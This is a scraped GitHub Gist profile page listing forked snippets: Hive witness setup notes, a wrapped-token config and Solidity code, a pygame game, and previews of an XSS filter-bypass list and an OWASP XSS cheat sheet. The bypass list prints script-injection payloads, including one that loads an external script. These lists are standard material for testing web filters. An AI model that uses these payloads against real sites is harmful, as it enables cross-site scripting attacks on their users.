Skip to content

Instantly share code, notes, and snippets.

View KINGdotNET's full-sized avatar
🌴
On vacation

EM @YEHEY KINGdotNET

🌴
On vacation
View GitHub Profile
@KINGdotNET
KINGdotNET / witness_setup.md
Created January 19, 2021 02:55 — forked from harpagon210/witness_setup.md
setup a witness node

1. Requirements

2. Install the Steem Smart Contracts node

To "install" the app, simply follow these steps:

@KINGdotNET
KINGdotNET / witness_setup.md
Created January 19, 2021 02:55 — forked from harpagon210/witness_setup.md
setup a witness node

1. Requirements

2. Install the Steem Smart Contracts node

To "install" the app, simply follow these steps:

#FRONTEND
#Hive Engine (HE) token name
TOKEN_NAME=
#HE token symbol
TOKEN_SYMBOL=
#Number of decimal places HE token has
HIVE_TOKEN_PRECISION=
#Number of decimal places Ethereum token has
@KINGdotNET
KINGdotNET / wHIVE
Created November 6, 2020 07:44 — forked from fbslo/wHIVE
pragma solidity ^0.5.11;
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
* - Addition cannot overflow.
@KINGdotNET
KINGdotNET / oracle.md
Created November 6, 2020 07:43 — forked from fbslo/oracle.md
Welcome file

Wrapped Hive Engine Tokens

EARLY ACCESS, not tested yet

As some of you might be aware, I've been working on Wrapped tokens for the last 3 months. First Wrapped Hive, then modified oracle for wLEO and now I'm presenting an out-of-a-box solution for anyone to create their own Hive Engine Wrapped Token. It's meant mostly for "owners" of HE tribes, but anyone can start one if they want.

I tried to make setup as easy as possible, but you will still need to follow some instructions. But it's as close to no-code as possible. I tried to create the same experience as the hive-in-a-box does for the witness setup.

@KINGdotNET
KINGdotNET / xxsfilterbypass.lst
Created June 21, 2020 04:36 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@KINGdotNET
KINGdotNET / xss-owasp-cheatsheet
Created June 21, 2020 04:34 — forked from sseffa/xss-owasp-cheatsheet
xss-owasp-cheatsheet
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
@KINGdotNET
KINGdotNET / game.py
Created March 18, 2019 02:10 — forked from PlainSight/game.py
Simple Multiplayer Python Game and Server
import pygame, sys
from pygame.locals import *
import pickle
import select
import socket
WIDTH = 400
HEIGHT = 400
BUFFERSIZE = 2048